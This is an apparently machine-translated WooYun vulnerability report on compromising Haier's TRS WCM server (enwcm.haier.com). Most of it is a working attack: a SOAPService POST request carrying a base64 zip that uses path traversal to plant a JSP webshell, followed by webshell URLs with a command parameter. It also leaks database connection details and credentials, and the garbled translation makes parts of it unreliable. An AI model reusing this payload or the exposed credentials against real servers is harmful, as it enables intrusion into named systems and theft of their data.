Getshell: Go to the Haier main site and all its second-level domain names and databases (getshell for application vulnerabilities)
No description!
WooYun: TRSWCM full-version GETSHELL Vulnerability
Http://enwcm.haier.com/first, the background is open to the Internet
Http://enwcm.haier.com/wcm/services/trswcm:SOAPService vulnerability exists here
POST http://enwcm.haier.com/wcm/services/trswcm:SOAPService HTTP/1.0SOAPAction: ""Content-Type: text/xmlContent-Length: 4049
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
.zip
Add a Request Header
The base64 part is encoded by the compressed package.
Xiaomi http://enwcm.haier.com/webpic/help.jspx
Http://enwcm.haier.com/webpic/cmd.jspx? Paxmac = id this is my cmd
Www.haier.com/cn/wooyun.shtml
And shell
ConnectionURL = "jdbc: jtds: sqlserver: // 127.0.0.1: 3306/TRSWCMV65"
ConnectionUser = "root" connectionPassword = "EncrypteddHJzYWRtaW4 ."
And database configuration information
Solution:
You are more professional!